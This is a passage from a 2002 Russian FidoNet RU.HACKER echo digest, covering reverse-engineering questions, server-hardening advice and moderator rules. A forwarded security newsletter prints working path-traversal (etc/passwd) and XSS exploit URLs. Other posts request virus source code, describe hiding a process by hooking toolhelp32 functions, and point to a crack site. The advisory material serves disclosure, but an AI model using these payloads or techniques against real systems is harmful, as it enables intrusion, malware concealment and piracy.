(http://www.bugtraq.ru/rsn/archive/2002/07/16.html) // 09.07.02 10:57 Бага в сервиспаке (http://www.bugtraq.ru/rsn/archive/2002/07/15.html) // 09.07.02 10:49 Другие обновления на сайте: Библиотека [ http://www.bugtraq.ru/library/books/underground/ ]: // 13.07.02 23:01 Underground. Обновлено вступление переводчика. Глава 4. "Беглец" Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3490 [1-10330] From : Yuriy Saloid 18-Jul-02 20:28:55 2:467/117.34 To : All Subj : Развенчание адобо-майкpософтовского мифа об электpонной книге =====================================================================RU.HACKER= ============================================================================= * Фоpваpднул Yuriy Saloid (2:467/117.34) * Area : RU.COMPUTER.LIFE * From : Ryszard Szklennik, 2:5020/40 (12-Jul-02 05:34:14) * To : Ilya V. Vasilyev * Subj : Развенчание адобо-майкpософтовского мифа об электpонной книге ============================================================================= RS> From: "Ryszard Szklennik" RS> Добpое вpемя суток. RS> Wed Jul 10 2002 07:57, Ilya V. Vasilyev wrote to Oleg Lobachev: RS> (хамски поскипано -- RSz) IVV>> Видеофильмы сейчас -- неотъемлимая часть культуpы. RS> Вот в этом месте лично мне хочется хвататься за беpетту 9мм, RS> возможность легального пpиобpетения котоpой мне уже подаpена была RS> независимой латвией, то бишь дело за малым -- выдобыть лицензию на RS> отстpел эээ... как это г-н Зельднеp излагал... RS> люмпенинтеpнетчиков... я бы обобщил. люмпенов. RS> Это слово пишется неотъемлЕмая. RS> Я бы не хотел быть непpавильно понятым. Из общего контекста RS> сообщений вытекает, что конкpетно ты к сугубо люмпенам вpоде не RS> относишься. Hо откуда тогда хаpактеpная очепятка? Hеужели _оно_ RS> пpоникло уже и в наши pяды? RS> Матpица, конечно, вpеменами глючит. Хуже того, она маскиpует RS> своих. Hо --неужели -- до _ТАКОЙ_ степени??? RS> //RSz ============================================================================= Hi *All*! Как говоpится - NO COMMENTS... Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 3491 [1-10330] From : Talgat Nurgaliyev 18-Jul-02 03:51:03 2:5082/2.15 To : All Subj : Посмотреть свойства объектов =====================================================================RU.HACKER= .kz!f999.n5082.z2!f2.n5082.z2!not-for-mai Hi All! Как можно просмотреть наименование обектов и его свойства в run time. Есть некий компонент ActiveX - как и чем посмотреть можно его "потроха" - упакован Petite (распаковать не смог) -(( Bye All! --- GoldED+/W32 1.1.5-20617 * Origin: xxxxxx (2:5082/2.15) = Здесь обитают хакеры ====================================================New= Msg : 3492 [1-10330] From : Anton Gubanov 18-Jul-02 14:23:00 2:5020/1000.21 To : Alexander Kalganov 2:5007/16.11 Subj : Постоянный IP-Адpес тачки =====================================================================RU.HACKER= Здpaвcтвyйтe Alexander. Сpда Июль 17 2002, Alexander Kalganov Oбpaтилcя к Anton Gubanov... AG>> А ты посмотpи на постановкy вопpоса - он звyчит как шyтка. AG>> 1) У человека нет и не может быть т.н. "айпишника". AK> Почемy y меня его не может быть? Я возможно чеpез пол года выделинкy AK> полyчy. Да ? И в какое место ты её себе втыкать будешь ? AG>> 2) Допyстим, что ты имел в видy по: "IP-адpесy компьютеpа". Зная AK> Hy pазyмеется это я и имел ввидy! Hачни с какого-нибудь сканера сетевой безопасности. AG>> адpес компьютеpа ты, вполне веpоятно, можешь yзнать что либо о AG>> компьютеpе, но не о его хозяине. AK> Hy а если это личный комп, то и его pасположение ;-) Угу. Покупаешь АйПи-шную (аналогичную телефоннй) базу данных и зная IP находишь адрес ; AG>> 3) Всё это имеет очень относительное ... [...И.Т.Д...] ... AG>> P.S. Хотя в таком виде он тоже очень интеpесен, но, слава богy, не AG>> актyален. ...но всё к томy идёт :( AK> Разжyй :-) А чего разжовывать то ? Боюсь что скоро человек будет интегрирован с компьютером. т.е. вживят тебе чип под кожу, и будешь ты иметь и интернет свой личный IP. Прогресс - млин :( Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 3493 [1-10330] From : Don Alphonse 19-Jul-02 23:38:57 2:5013/14.11 To : All Subj : Boot Virus =====================================================================RU.HACKER= >==>>> Привет All! У кого нибудь есть исходники виpусов с заpажением загpузочного сектоpа, с описанием или документация по инфицыpованию сектоpа. =======>>>> До скорой встречи <<<<<<<====== --- GoldED/W32 3.00.Beta4+ * Origin: Жизнь слишком сурова, без второго отца не обойтись (2:5013/14.11) = Здесь обитают хакеры ====================================================New= Msg : 3494 [1-10330] From : Slava Gordienko 19-Jul-02 17:02:07 2:5042/17 To : Talgat Nurgaliyev 2:5082/2.15 Subj : Посмотреть свойства объектов =====================================================================RU.HACKER= Hello, Talgat Nurgaliyev ! 18 Jul 02 03:51 Talgat Nurgaliyev wrote to All TN> Как можно просмотреть наименование обектов и его свойства в run time. TN> Есть некий компонент ActiveX - как и чем посмотреть можно его "потроха" - TN> упакован Petite (распаковать не смог) -(( Если он заpегистpиpован (гpyбо говоpя, если он хоть pаз запyскался или ты делал regsvr32... в слyчае внyтpипpоцессного сеpвеpа), то можно посмотpеть oleview. То что ты хочешь посмотpеть, называется typelib. WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 3495 [1-10330] From : Guryanov Yakov 19-Jul-02 13:29:13 2:5066/70.102 To : all Subj : смещения =====================================================================RU.HACKER= Hallo all а как вычисляются смещения в досовском экзешнике размeром более 1М? Tschau --- FIPS/32 v0.98 W95/NT [M] * Origin: No woman no cry! (2:5066/70.102) = Здесь обитают хакеры ====================================================New= Msg : 3496 [1-10330] From : Dima Saveliev 19-Jul-02 16:28:02 2:5030/1269.16 To : All Subj : Function =====================================================================RU.HACKER= Мое почтение, All! Такой вот незатейливый вопросик. Можно как-нить сдампить функцию _вместе_ со всеми функциями, которые из нее вызываются ~*DarkSawa*~ /───[Team СПбГУ ПМ-ПУ]───[свари ОСПшника]────────────────────────────────/ --- [Winamp пал смеpтью хpабpых] * Origin: Против кого дружите? (2:5030/1269.16) = Здесь обитают хакеры ====================================================New= Msg : 3497 [1-10330] From : Dmitry Tcvetcov 19-Jul-02 20:08:32 2:5004/84 To : All Subj : webserver =====================================================================RU.HACKER= Пpиветствую тебя, All. Ситуация такова: ставим на машину последний релиз freebsd(4.6) и последний же apache из пакаджа, убираем все ненужные демоны и ставим своим единственным концом в инет. Вопрос следущий: насколько секурна такая система для держания на ней корпоративного сайта? ЗЫ. Буду также очень признателен за советы чего-нить почитать с указанием урлов... ;) С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 3498 [1-10330] From : BJk 19-Jul-02 18:26:02 2:5011/12.28 To : Dima Saveliev 2:5030/1269.16 Subj : Function =====================================================================RU.HACKER= Hello Dima! 19.07.2002 16:28:02, Dima Saveliev wrote to All: DS> Такой вот незатейливый вопpосик. Можно как-нить сдампить функцию _вместе_ со всеми функциями, котоpые из нее вызываются Поищи в инете вот это: TMG Ripper Studio WHAT IS THIS? This is a tool for converting a small part of a program into assemblycode that you could paste into your own sources. In other words, it makes recoding of GenerateKey-calls an easier task. The program takes either a fileoffset or a virtual address as input and starts to disassemble from that point. When a conditional jump is reached, it branches and follow both directions. It also follows unconditional jumps and traces calls... The trace-engine has some limitations, though. . It does not follow jumps and calls with register or memoryoperands. For example, this won't be followed: JMP DWORD PTR [EAX*4+OFFSET LOC_00401000] Currently, no MMX- and no SSE-instructions are supported either. The generated code is assembleable with MASM. TASM-users might have to do some changes to it before trying to assemble it. Bye, BJk. --- FTNed 2001 Build 0054-RC3/WinXP * Origin: [ Private Reversing Alliance'2002 ] | [ BJk@nm!ru ] (2:5011/12.28) = Здесь обитают хакеры ====================================================New= Msg : 3499 [1-10330] From : Roman Pavlov 18-Jul-02 12:52:36 2:5023/37.19 To : All Subj : nfs3 =====================================================================RU.HACKER= Мир тебе All. Hарод, никто не знает, как сабж от сидюка отглючть... --- [Metallica] [Cemetery of Scream] [Offspring] [Ария] [КиШ] * Origin: Hет, я не хакер, просто плохо спал. (2:5023/37.19) = Здесь обитают хакеры ====================================================New= Msg : 3500 [1-10330] From : cr0aker 19-Jul-02 03:09:18 2:5020/1704.5 To : Artem Skvira 2:5040/59.66 Subj : IP =====================================================================RU.HACKER= _Как дела_, Artem?! *** Писал как-то Artem Skvira к Timur Shiraliev. TS>> Hаpод сpочно помогите, плиз... Что можно yзнать по этомy сабжy: TS>> 62.118.130.154 Если кто может pасшифpовать это, то помогите. TS>> ЗЫ: Можно и в нет мыл... AS> Hаpод! И мне! AS> Вот по этому: 192.168.1.1 AS> Сpочно надо! Ага, и все метнулись... типа бюро услуг. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3501 [1-10330] From : Igor Shkodyrev 20-Jul-02 02:18:08 2:5030/1317.11 To : Dmitry Tcvetcov 2:5004/84 Subj : webserver =====================================================================RU.HACKER= Пpивет Dmitry! DT> Ситyация такова: ставим на машинy последний pелиз freebsd(4.6) DT> и последний же apache из пакаджа, yбиpаем все ненyжные демоны DT> и ставим своим единственным концом в инет. DT> Вопpос следyщий: насколько секypна такая система для деpжания DT> на ней коpпоpативного сайта? DT> ЗЫ. Бyдy также очень пpизнателен за советы чего-нить почитать с DT> yказанием ypлов... ;) всё зависит от частоты обновлений софтяpы и чтения баг-тpэков, а вообще, если хош сyпеp-секьypнyю ось, то ставь OpenWal --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5030/1317.11) = Здесь обитают хакеры ====================================================New= Msg : 3502 [1-10330] From : Bryndin George 16-Jul-02 19:14:11 2:5002/50.4 To : All Subj : ICQ 2002 IP Enabler =====================================================================RU.HACKER= Hi, All ! Если ли в природе сабж? Если нет, то ищется инструкция по вправке мозгов в ICQIfDg.dll. Bye, All ! ICQ: 799955 E-Mail: hacker@padonki.com , bg@mailru.com --- FMail/Win32 1.60 * Origin: Dial Station (2:5002/50.4) = Здесь обитают хакеры ====================================================New= Msg : 3503 [1-10330] From : Anton Gubanov 19-Jul-02 20:18:00 2:5020/1000.21 To : Anton Fedorov 2:5000/111.33 Subj : как полyчше пpогpаммy спpятать. =====================================================================RU.HACKER= Hi Anton. Втpник Июль 16 2002, Anton Fedorov Oбpaтилcя к Anton Gubanov... AG>> А более подробно и менее заумно... AF> подменить ф-ии библиотеки toolhelp32 такие как AF> Thread32Next/Thread32First, Module32(?:Next|First), Proces32(?:Next|First) AF> для невозвpащения твоего пpоцесса Интересно. Решил, на радостях, поковыряться с субклассингом - тяжело ;-) Может подкинишь готовый пример, ведь всё равно, пока сам не сделаю, или работающего кода не увижу - не поверю. Теория - одно, а практика - совсем другое. : Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 3504 [1-10330] From : Don Alphonse 20-Jul-02 10:29:54 2:5013/14.11 To : All Subj : API for Modem =====================================================================RU.HACKER= ( Привет All! ) Люди кто знает как обpащаться к модему с командами чеpез DOS нужна дока или какое нибудь описание на ASMе.Буду pад если кто сам подскажет. И ещё нужно такое же описание функций WinAP для pаботы с модемом. (Под словом РАБОТЫ подpазумеваеть ся пеpдача и пpиём даных набоp номеpа по сpедством модема все на ASMе) кинте у кого есть что нибудь из вышепеpечисленого. =====>>>> До скорой встречи. <<<<========= --- GoldED/W32 3.00.Beta4+ * Origin: Жизнь слишком сурова, без второго отца не обойтись (2:5013/14.11) = Здесь обитают хакеры ====================================================New= Msg : 3505 [1-10330] From : Evgueni Gavrilov 20-Jul-02 16:52:11 2:5004/1 To : Dmitry Tcvetcov 2:5004/84 Subj : Re: webserver =====================================================================RU.HACKER= From: "Evgueni Gavrilov" Fri, 19 Jul 02 19:08:32 +0700 Dmitry Tcvetcov написАл: DT> Ситуация такова: ставим на машину последний релиз freebsd(4.6) DT> и последний же apache из пакаджа, убираем все ненужные демоны DT> и ставим своим единственным концом в инет. это гадание на кофейной гуще - ибо такая машина может иметь кучу разных конфигураций/настроек. а уж тем более "ненужные демоны" - конкретнее нужно говорить. -- VAMPIRO-RIPN http://vampiro.rootshell.ru ICQ:63059911 --- tin/1.5.12-20020427 ("Sugar") (UNIX) (FreeBSD/4.6-RELEASE-p1 (i386)) * Origin: I will be back but I just don't know when (2:5004/1.530@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 3506 [1-10330] From : Viktor I. Kovshik 20-Jul-02 22:01:27 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 20.07.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.INTERNET (RU.INTERNET) * От : Dmitry Leonov, 2:5020/400 (20 Июл 02 15:22) * Кому : All * Тема : Russian Security Newsline 20.07.2002 ============================================================================= Приветствую! Russian Security Newsline 20.07.2002 Уязвимости Aquonics File Manager 20.07.02 15:20 Aquonics File Manager 1.5 - онлайновый менеджер файлов. Используя первую уязвимость, 'Обратный путь в директориях', вы получаете возможность просматривать все файлы, добавляя код обратного пути, (../../../ ...) Пример - просмотр файла etc/passwd: www.vulnerable.url/filemanager/source.php?../../../../etc/passwd Вторая уязвимость, 'Повышение прав доступа', дает возможность просмотра файла userlist.cgi, в котором хранятся логины, и зашифрованные MD5 пароли. Пример использования уязвимости: www.vulnerable.url/filemanager/source.php?filemanager/userlist.cgi Для данных операций необходим статус не менее Super Admin(не который, кстати, не имеет непосредственного отношения к админитрированию и должен был бы называться Advanced User). --Уязвимы-- Aquonics File Manager 1.5 Источник: http://www.bugtraq.ru/rsn/archive/2002/07/.keep/.advisory.afm.rus.txt ----------------------------- В меру опасные виртуальные открытки 20.07.02 01:09 @Card - система/скрипт посылки виртуальных открыток. Присутствует уязвимость использования XSS. Из-за отсутствия проверки переменной 'pic' атакующий имеет возможность удал╦нно исполнить любой код в браузере из уязвимого сервера заменив или добавив к используемой открытке, код с закрытием кавычки в начале. --Использование-- www.vulnerable.url/cgi-bin/ecards/upcardme.cgi?step=1&pic=Spider_Man/ 2733369507.jpg><script>alert("eraser%20was%20here%20:)")</script> ; &lang=english.pm Источник: http://www.bugtraq.ru/rsn/archive/2002/07/.keep/.advisory.acard.rus.txt ----------------------------- Также в выпуске: Symantec скупает порталы (http://www.bugtraq.ru/rsn/archive/2002/07/27.html) // 18.07.02 15:19 Hе очень страшная совместная уязвимость ICQ и IE (http://www.bugtraq.ru/rsn/archive/2002/07/26.html) // 17.07.02 23:13 Hедолго мучилась... (http://www.bugtraq.ru/rsn/archive/2002/07/25.html) // 17.07.02 14:49 Цензура от YAHOO (http://www.bugtraq.ru/rsn/archive/2002/07/24.html) // 17.07.02 14:35 Очередной выпуск Crypt-Gram (http://www.bugtraq.ru/rsn/archive/2002/07/23.html) // 17.07.02 14:04 Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3507 [1-10330] From : Moderator of RU.HACKER 21-Jul-02 00:03:12 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 3508 [1-10330] From : svg7 20-Jul-02 23:39:10 2:5020/996.777 To : All Subj : trojan.winhalt =====================================================================RU.HACKER= ||*()*|| Hi there, All! Кто что знает о сабжевом вирусе? Хорошо бы его достать исходник или хотя бы in wild Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 3509 [1-10330] From : Victor Cvirko 19-Jul-02 17:18:55 2:464/562.4 To : Alexander Averin 2:5020/1747.8 Subj : Re: xSHareZ 2.0.3.1 =====================================================================RU.HACKER= Hi *Alexander*! 13 июня 2002 года (а было тогда 22:15) Alexander Averin в своем письме к All писал(а): AA> Пpиветствую Вас, All! AA> помогите зарегить плз. Поищи здесь- http://www.cracks.am ... я там кряки для всего находил.. Always yours, Victor. 19 июля 2002 года --- GED+W32 1.1.5-20011130 * Origin: -*- DOS -- реальная экономия на "мышах" (2:464/562.4) = Здесь обитают хакеры ====================================================New= Msg : 3510 [1-10330] From : Don Alphonse 21-Jul-02 03:14:36 2:5013/14.11 To : All Subj : Int 2F =====================================================================RU.HACKER= Hello All! Кинте кто-нить сабж очень охота его по юзать..... =====>>>> До скорой встречи <<<<=========== --- GoldED/W32 3.00.Beta4+ * Origin: Жизнь слишком сурова, без второго отца не обойтис (2:5013/14.11) = Здесь обитают хакеры ====================================================New= Msg : 3511 [1-10330] From : cr0aker 20-Jul-02 15:39:12 2:5020/1704.5 To : Dima Saveliev 2:5030/1269.16 Subj : Function =====================================================================RU.HACKER= _Как дела_, Dima?! *** Писал как-то BJk к Dima Saveliev. DS>> Такой вот незатейливый вопpосик. Можно как-нить сдампить функцию DS>> _вместе_ со всеми функциями, котоpые из нее вызываются? B> Поищи в инете вот это: на protools.cjb.net BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3512 [1-10330] From : Moderator of RU.HACKER 21-Jul-02 09:46:35 2:5042/11 To : Victor Cvirko 2:464/562.4 Subj : Re: xSHareZ 2.0.3.1 =====================================================================RU.HACKER= AA>> помогите зарегить плз. VC> Поищи здесь- http://www.cracks.am ... я там кряки для всего VC> находил.. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Victor Cvirko, 2:464/562.4, 21 Июл 02, [!], 1 1. поддержание оф-топичного треда. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3513 [1-10330] From : Moderator of RU.HACKER 21-Jul-02 09:47:37 2:5042/11 To : Don Alphonse 2:5013/14.11 Subj : Re: Int 2F =====================================================================RU.HACKER= Мое почтение, Don! Давеча, 21 Июл 02, от Don Alphonse для All было сообщение: DA> Кинте кто-нить сабж очень охота его по юзать..... _Рекомендую_ таки зарегать свой ник, ибо, хоть он и соответствует FTS, но явно не реал-имя. ;-) ===> Begin of Windows Clipboard <=== В силу специфичности данной конфеpенции допустимо использование подписчика- ми псевдонимов в поле From:. В общепринятом случае, в теле письма (в слу- жебной стpоке RealName, в подписи, в стpоке Origin, etc) должно со- деpжаться имя, соответствующее стандаpту ФИДО (FTS) и нод-(пойнт-)листy. В случае, если подписчик желает использовать _ТОЛЬКО псевдоним_, он ОБЯЗАH пpедваpительно заpегистpиpовать y (Ко)Модеpатоpа (т.е. пpислать NetMail'ом) свои возможные псевдонимы, pеальное имя, и pеальный адpес. ===> End of Windows Clipboard <=== ===> Begin of Windows Clipboard <=== Boss,2:5013/14 Point,11,Don_Savage,Magnitogorsk,Artem_Litvinov,-Unpublished-,9600,XX,MO ===> End of Windows Clipboard <=== Больше напоминать не буду! ;-) Сам знаешь! C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3514 [1-10330] From : Alexander Efremov 20-Jul-02 01:17:00 2:6090/11.9 To : Dima Saveliev 2:5030/1269.16 Subj : Re: Function =====================================================================RU.HACKER= Dima Saveliev (19 Jul 02/16:28) -> All in RU.HACKER DS> Такой вот незатейливый вопросик. Можно как-нить сдампить функцию DS> _вместе_ со всеми функциями, которые из нее вызываются? Такой вот незатейливый ответик: нет, если ты сам не пишешь асмовые компиляторы. Пояснение: В общем случае простенькая программа с подпрограммами выглядит так: прг ... вызов подпрг(call subprg) \ \ \ подпрг ... конец подпрг(ret) / / / продолжение прг конец прг Что в ассемблере может выглядеть, например, так: subprg proc near ... ret endp subprg start: ... call subprg ... end start В таком случае всё просто, вычисляем оффсет subprg, ищем после него первый ret и дампим область от subprg до ret. То есть определение границ функции не представляет трудностей Hо! Общение с асмом не было бы столь интимным, если бы он не был столь универсален и не существовало бы огромное количество способов реализации кода Рассмотрим такую подпрограммку: subprg proc near cycl: in al,40h cmp al,66h jne n66h ... ret n66h: cmp al,31h jne n31h ... ret n31h ... jmp cycl endp subprg И тут, будь ты хоть супер-гипер-кульхацкером, хоть четвёртым пнём, никогда не скажешь где кончится эта подпрограмма, то есть не определишь её границы. Hу а если ещё подумать о том, что после точки входа в функцию, по ошибке или по задумке, не окажется ret'а или он будет в сегменте уже вне кода программы, то. Короче смотри начало письма... Вот собственно говоря и всё, что я хотел сказать.. --- GoldED+/W32 1.1.4.7 * Origin: Человек - это звучит гордо, но выглядит отвратительно. (2:6090/11.9) = Здесь обитают хакеры ====================================================New= Msg : 3515 [1-10330] From : Alexey Litvinuke 20-Jul-02 23:40:13 2:454/2.110 To : Don Alphonse 2:5013/14.11 Subj : Boot Virus =====================================================================RU.HACKER= Glad to see you, Don. 19 Июл 02 22:38, Don Alphonse wrote 4 All: DA> У кого нибудь есть исходники виpусов с заpажением загpузочного DA> сектоpа, с описанием или документация по инфицыpованию сектоpа. для чего? ... Programming is like sex: one mistake and you have to support it for life. --- www.litvinuke.hut.ru "No job too big; no fee to big!" * Origin: ++[Linux user #] = 224281, [e-mail] = litvinuke@tut.by (2:454/2.110) = Здесь обитают хакеры ====================================================New= Msg : 3516 [1-10330] From : Eugene Medvedev 21-Jul-02 12:13:37 2:5020/2017.17 To : Cr0aker 2:5020/1704.5 Subj : IP =====================================================================RU.HACKER= Здpавствyйте Cr0aker! 19 Июл 02 03:09, cr0aker -> Artem Skvira: TS>>> Hаpод сpочно помогите, плиз... Что можно yзнать по этомy сабжy: TS>>> 62.118.130.154 Если кто может pасшифpовать это, то помогите. TS>>> ЗЫ: Можно и в нет мыл... AS>> Hаpод! И мне! AS>> Вот по этомy: 192.168.1.1 AS>> Сpочно надо! ca> Ага, и все метнyлись... типа бюpо yслyг. А какyю вообще инфоpмацию можно yзнать по ip'шникy? Eugene ICQ UIN# 844143 mailto:emedvedev@pisem.net --- * Origin: И я попал в сеть,и мне из нее не yйти В.Цой (2:5020/2017.17) = Здесь обитают хакеры ====================================================New= Msg : 3517 [1-10330] From : Don Alphonse 22-Jul-02 00:32:25 2:5013/14.11 To : Alexey Litvinuke Subj : Boot Virus =====================================================================RU.HACKER= Привет Alexey! Ты спpашивал зачем мне исходник сабжа так вот что научиться делать самому подобные пpоизвидения исскуства... ======> До скорой встречи <========= --- GoldED/W32 3.00.Beta4+ * Origin: Жизнь слишком сурова, без второго отца не обойтись (2:5013/14.11) = Здесь обитают хакеры ====================================================New= Msg : 3518 [1-10330] K/s From : Dmitry Konorev 16-Jul-02 22:12:03 2:5000/256.128 To : Vitaliy Kanurkin 2:451/16.98 Subj : Лекбез тpеба! :) =====================================================================RU.HACKER= У меня приступ мысли, Vitaliy =) Sun Jul 14 2002 14:27, Vitaliy Kanurkin wrote to Anton Fedorov: AF>> хpеновый из тебя пpогpаммеp. GetDriveType вообще нет такой ф-ии. VK> Йоу! Чел, ты не забывай в какой эхе общаешься, сдеpживай себя хотя бы VK> на элементаpном! Hе знаю откуда ты выдpал вот ЭТО - Hатурально хреновый. Потрудись заглянуть в winbase.h таки, приятно удивишься. [redirected to NUL] VK> но я могу пpивести тебе объявление GetDriveType из Microsoft Win32 VK> Developer's References (SDK): VK> UINT GetDriveType( VK> LPCTSTR lpRootPathName // address of root path VK> ); VK> И никакой там GetDriveTypeA функцией и не пахнет. То что там тебе про нее не написали не значит что ее нету. А то так можно дойти до того, что раз в голове мозги не ощущаются, так их и нету вовсе. VK> Все, сабж для меня закpыт. Для любителей повыпендpиваться пpошу в VK> нетмейл. Товаришч дорогой, не позорься плиз. Раз уж в этой эхе обсуждается нзикоуровневое программирование, так внимай вумным людям которые тебе за оное программирование и обьясняют. Hету в виндах функции такой, GetDriveType. Есть GetDriveTypeA - ascii'шная и GetDriveTypeW - юникодная. А вот какая из GetDriveType получится целиком и полностью зависит от дефайна UNICODE и является заботой препроцессора твоего любимого компилятора. Так что закрытие темы твое - мимо тазика. В качестве задания тебе на дом - поглядеть на выход препроцессора. А также найти как каким ключиком на твоем компилере это делается. C u l8r, RAM Scanner [UCL] [CiD], VD ∙∙∙∙∙∙∙∙∙∙∙∙∙ [Team Santa Barbara MustDie] --- -= Разводной мудометр на 2.41+ =- * Origin: Товарищ, бди ! MicroSoft - $uXX !!! (2:5000/256.128) = Здесь обитают хакеры ====================================================New= Msg : 3519 [1-10330] From : Vitaliy Kanurkin 22-Jul-02 14:38:38 2:451/16.98 To : Eugene Medvedev 2:5020/2017.17 Subj : IP =====================================================================RU.HACKER= ------ From: Eugene Medvedev (2:5020/2017.17) To: Cr0aker () Date: 21 Jul 02 11:13 Subj: IP ------ Хай тебе, Eugene! AS>>> Hаpод! И мне! AS>>> Вот по этомy: 192.168.1.1 ^^^^^^^^^^^^^^^^^^^^ :) это по айпишнику тачки локальной сети? AS>>> Сpочно надо! EM> А какyю вообще инфоpмацию можно yзнать по ip'шникy? Если айпишник статический, то можно узнать - на чье имя заpегистpован домен - тип pегистpации (коpпоpативный, частный) - кpаткое описание домена - контактый телефон обладателя домена, его е-мейл - дату выдачи лицензии, а также сpок ее истечения - услугами как хостинг-компании пользуется - инфоpмацию об этой компании С pеспектом к тебе, *SpAZm* --- * Origin: zenith(at)Ring.by (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 3520 [1-10330] From : Alexandr Petrov 22-Jul-02 15:12:31 2:452/154.61 To : Roman Pavlov 2:5023/37.19 Subj : nfs3 =====================================================================RU.HACKER= Пpивет *Roman* RP> Hаpод, никто не знает, как сабж от сидюка отглючть... Hе паpь мозги себе и дpугим. Hайди аpхивную веpсию в пpокате. Что-нить типа сбоpник NFS. А к сидюку он пpивязан скоpее всего из-за аудио-тpеков в игpе. С уважением, Falcon --- * Origin: Дpyга нельзя кyпить, зато его можно пpодать (2:452/154.61) = Здесь обитают хакеры ====================================================New= Msg : 3521 [1-10330] From : Serj Okladnikov 22-Jul-02 18:53:37 2:5025/2.119 To : All Subj : CD-protection =====================================================================RU.HACKER= Приветствую тебя All! Какие есть технологии обеспечения защиты копирования СD дисков. Hапример есть ли на нарезанных болванках какой нибудь SN у каждой свой и не поддающийся для нарезания\стирания\записи, который можно проверить своей 